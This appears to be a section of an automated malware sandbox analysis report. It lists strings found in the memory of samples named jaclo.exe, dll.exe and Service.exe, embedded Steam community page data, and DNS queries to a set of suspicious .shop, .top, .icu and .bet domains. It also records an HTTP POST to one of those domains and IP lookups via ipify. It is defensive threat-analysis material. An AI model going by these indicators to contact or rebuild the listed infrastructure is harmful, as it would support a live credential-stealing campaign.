SameSite=Nonesessionid=2181ac080087ccbd00da0d7c; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 15 Mar 2025 15:39:14 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: jaclo.exe, 0000000D.00000003.1385496112.000000000137B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=69bd117f5b804e6b996d6802; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 15 Mar 2025 15:39:13 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-ControlR equals www.youtube.com (Youtube)
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=c6614cf12f3b266ca3cb6c03; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 15 Mar 2025 15:39:35 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-ControlRI equals www.youtube.com (Youtube)
Source: dll.exe, 00000010.00000003.1587060011.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=e88e16f0f92d4bea67712150; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 15 Mar 2025 15:39:33 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-ControlR]]$SX equals www.youtube.com (Youtube)
Source: dll.exe, 00000010.00000003.1611227058.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000127D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www= equals www.youtube.com (Youtube)
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: dll.exe, 00000010.00000003.1571451074.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.0000000004015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: e-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: dll.exe, 00000010.00000003.1571451074.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: e-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=f825dcc90a93121322e63e41; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-Ran equals www.youtube.com (Youtube)
Source: dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558746783.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523271647.0000000004014000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: e-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=f825dcc90a93121322e63e41; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-Ran$$P equals www.youtube.com (Youtube)
Source: dll.exe, 00000010.00000003.1496894411.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496560456.0000000004015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: eampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: dll.exe, 00000010.00000003.1496894411.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496560456.0000000004015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: eampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=f825dcc90a93121322e63e41; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type36132Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 15 Mar 2025 15:39:23 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control.X equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: kbracketba.shop
Source: global traffic	DNS traffic detected: DNS query: featureccus.shop
Source: global traffic	DNS traffic detected: DNS query: mrodularmall.top
Source: global traffic	DNS traffic detected: DNS query: jowinjoinery.icu
Source: global traffic	DNS traffic detected: DNS query: legenassedk.top
Source: global traffic	DNS traffic detected: DNS query: htardwarehu.icu
Source: global traffic	DNS traffic detected: DNS query: cjlaspcorne.icu
Source: global traffic	DNS traffic detected: DNS query: bugildbett.top
Source: global traffic	DNS traffic detected: DNS query: latchclan.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: weaponrywo.digital
Source: global traffic	DNS traffic detected: DNS query: crosshairc.life
Source: global traffic	DNS traffic detected: DNS query: pupmeholk.bet
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: unknown

HTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 41Host: pupmeholk.bet

Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: Service.exe, Service.exe, 00000016.00000002.2513052311.00000261425C3000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513052311.000002614254B000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2513144408.00000270A9EDE000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2513144408.00000270A9E9C000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2513144408.00000270A9EEE000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2512975134.0000026791D09000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2512975134.0000026791CB8000.00000004.00000020.00020000.00000000.sdmp, Service.exe.18.dr	String found in binary or memory: http://api.ipify.org
Source: Service.exe, 00000017.00000002.2513144408.00000270A9E9C000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2513144408.00000270A9EEE000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2512975134.0000026791D09000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2512975134.0000026791CB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: Service.exe, 00000016.00000002.2513052311.000002614254B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/5G
Source: Service.exe, 00000018.00000002.2512975134.0000026791CB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/LH
Source: Service.exe, 00000016.00000002.2513052311.00000261425CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/R
Source: Service.exe, 00000018.00000002.2512975134.0000026791CB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/TH
Source: Service.exe, 00000016.00000002.2513052311.000002614254B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/UG
Source: Service.exe, 00000018.00000002.2512975134.0000026791D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/er
Source: Service.exe, 00000018.00000002.2512975134.0000026791D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/fons
Source: Service.exe, 00000018.00000002.2512975134.0000026791CB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/ngs
Source: Service.exe, 00000017.00000002.2513144408.00000270A9EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/s
Source: Service.exe, 00000016.00000002.2513052311.000002614254B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org6
Source: Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe.18.dr	String found in binary or memory: http://api.ipify.orgInternetOpenUrl
Source: Service.exe, 00000017.00000002.2513144408.00000270A9E9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgc
Source: Service.exe, 00000016.00000002.2512379907.0000006EFF6F9000.00000004.00000010.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2512372468.000000CD352F9000.00000004.00000010.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2512378824.000000B1744F9000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://api.pifk
Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: dll.exe, 00000010.00000003.1423975243.000000000120A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436310085.00000000011FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered
Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.enigmaprotector.com/
